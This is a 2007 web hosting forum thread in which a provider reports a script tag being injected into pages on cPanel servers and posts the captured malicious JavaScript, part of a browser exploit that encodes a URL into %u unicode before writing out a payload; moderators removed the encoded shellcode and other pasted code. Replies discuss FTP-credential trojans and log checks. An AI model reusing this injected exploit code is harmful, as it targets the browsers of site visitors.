hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : Linux servers having CPANEL - js virus hitting
Reply

Forum Jump

Linux servers having CPANEL - js virus hitting

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old
WHT Addict
 
Join Date: May 2004
Location: chicago
Posts: 173
Exclamation

Linux servers having CPANEL - js virus hitting


Hi All,


Earlier this week, our users started reporting that they were getting active-x prompts for Microsoft Data Access Component installation. In addition some of them were getting hit byt the RTSP bug (quicktime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, etc) at times a script tag similar to the one below is inserted right after the <body> tag.

<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below).

Solutions tried:
I have checked for the filenames but they do not exist on the server.

1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean


Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.

Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}

var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";

var SB =
<<removed encoded exploit>>

document.write (SB);

Thanks,
Regards
Rushik Shah

__________________
CEO - Alakmalak Technologies www.Alakmalak.com
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA


Last edited by bear; 11-25-2007 at 09:59 PM. Reason: Pointless to help spread this


Sponsored Links
  #2  
Old
Web Hosting Master
 
Join Date: Apr 2001
Location: Paradise
Posts: 11,603
Anybody have the FTP information of all the accounts having this problem? it may be possible that a compromised computer were infecting those sites without even knew it.

__________________
Shared Web Hosting - Reseller Hosting - Semi-Dedicated Servers - SolusVM/XEN VPS
LiteSpeed Powered - R1Soft Continuous Data Protection - 24/7 Chat/Email/Helpdesk Support
Cpanel/WHM - Softaculous - R1soft Backup - Litespeed - Cloudlinux -Site Builder- SSH support - Account Migration
DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore

  #3  
Old
& Goliath
 
Join Date: Oct 2003
Location: Chattanooga
Posts: 8,903
It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data, far too much effort

Sponsored Links
  #4  
Old
WHT Addict
 
Join Date: May 2004
Location: chicago
Posts: 173
Hi Jedito / David

Thanks for your quick reply. Actually I already did this check

I changed ftp passwords, but still it got effected after 3-4 days again.

The matter of fact is almost all websites on the server are affected. Mostly the index . html, php files

Any clue

Thanks!
Regards
Rushik Shah

__________________
CEO - Alakmalak Technologies www.Alakmalak.com
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA

  #5  
Old
Web Hosting Master
 
Join Date: Apr 2001
Location: Paradise
Posts: 11,603
Quote:
Originally Posted by David View Post
It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data, far too much effort

There's an trojan which does this automatically, the trojan infect the computer and pickup all the FTP book of any FTP program installed in the computer, it does send it to the "hacker" which lately use it to upload the infected data, this happened to one of my resellers awhile ago.

to the OP, check on the FTP logs of the affected account which files were uploaded and check if the IP uploading those files mismatch in all them.

__________________
Shared Web Hosting - Reseller Hosting - Semi-Dedicated Servers - SolusVM/XEN VPS
LiteSpeed Powered - R1Soft Continuous Data Protection - 24/7 Chat/Email/Helpdesk Support
Cpanel/WHM - Softaculous - R1soft Backup - Litespeed - Cloudlinux -Site Builder- SSH support - Account Migration
DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore

  #6  
Old
Web Hosting Evangelist
 
Join Date: Jul 2005
Location: Belgium
Posts: 506
Hi,

Which platforms does this trojan infects? Do you know its name?

Thanks,
sash

__________________
kept alive by vertaalbureau

  #7  
Old
Junior Guru Wannabe
 
Join Date: Nov 2007
Posts: 51
Is there a way to stop this from happening on a cpanel server?

  #8  
Old
Community Guide
 
Join Date: Apr 2005
Posts: 1,551
Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

find / -name *.js | xargs grep unescape

__________________
☊ Talk to family, friends, teammates and colleagues with a myMumble voice server. Over 14 locations around the world!
SysadminBoard - Share and obtain knowledge directly from veteran systems administrators.

  #9  
Old
the ground beneath my feet
 
Join Date: Feb 2006
Posts: 1,108
The code is here: <<snipped>>

__________________
semi-retired


Last edited by not-even-a-mouse; 11-25-2007 at 09:04 PM.
  #10  
Old
Community Guide
 
Join Date: Apr 2005
Posts: 1,551
Also, check xferlog and see who uploaded it.

__________________
☊ Talk to family, friends, teammates and colleagues with a myMumble voice server. Over 14 locations around the world!
SysadminBoard - Share and obtain knowledge directly from veteran systems administrators.

  #11  
Old
Web Hosting Master
 
Join Date: May 2003
Location: Kirkland, WA
Posts: 4,448
To clarify, there is absolutely no evidence provided that this is at all isolated to cPanel even if it is in fact an issue.

__________________
Nick Nelson
Sr. Director & GM, VAS
Demand Media
425.298.2282 nn@demandmedia.com

  #12  
Old
Community Guide
 
Join Date: Apr 2005
Posts: 1,551
Don't paste code like that on a public forum.

__________________
☊ Talk to family, friends, teammates and colleagues with a myMumble voice server. Over 14 locations around the world!
SysadminBoard - Share and obtain knowledge directly from veteran systems administrators.

  #13  
Old
the ground beneath my feet
 
Join Date: Feb 2006
Posts: 1,108
Quote:
Originally Posted by zacharooni View Post
Don't paste code like that on a public forum.
It's already in the OP, just URI encoded.

__________________
semi-retired

  #14  
Old
Community Leader
 
Join Date: Oct 2002
Location: Neck deep in it
Posts: 20,241
Quote:
Originally Posted by Procyon View Post
It's already in the OP, just URI encoded.
Not any more. Let's try not to feed the "kiddies".

__________________
Having problems, or maybe questions about WHT? Head over to the help desk!



  #15  
Old
Web Hosting Guru
 
Join Date: Sep 2003
Location: Europe
Posts: 298
Hello Rushik,

I can second your findings. The exploit appears all the time on different pages (the page indicated by KIS keeps changing, usually HTML) and it doesn't appear twice for the same IP and this seems to me to be related to IE only. Have you discovered anything new?

Quote:
Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

find / -name *.js | xargs grep unescape
There is usually NO unescape(), no eval(), no iframe anywhere on the affected accounts. The .js file (this also changes) doesn't even exist anywhere on the server. It's like Trojan-Downloader.JS.Small.fs gets generated on the fly (in our case it tries to download a Exploit.HTML.IESlice.n from <<removed>>

Any clue anyone?

Thanks and regards!


Last edited by bear; 11-28-2007 at 07:27 AM.
Reply

Related posts from TheWhir.com
Title Type Date Posted
GoDaddy Supports cPanel as Part of Web Hosting Updates Web Hosting News 2014-05-09 12:40:20
CloudLinux Releases New Inode Limits Feature for cPanel Web Hosting News 2013-08-28 16:38:27
TrendyTools Launches HTML 5 Website Builder cPanel Plugin Web Hosting News 2013-08-07 14:18:20
Web Hosting Sales and Promos Roundup – March 22, 2013 Web Hosting News 2014-05-23 15:43:14
SSHD Rootkit in the Wild Blog 2013-02-22 16:44:08


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
WHT Host Brief Email:

We respect your privacy. We will never sell, rent, or give away your address to any outside party, ever.

Advertisement:
Web Hosting News:
WHT Membership
WHT Membership



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?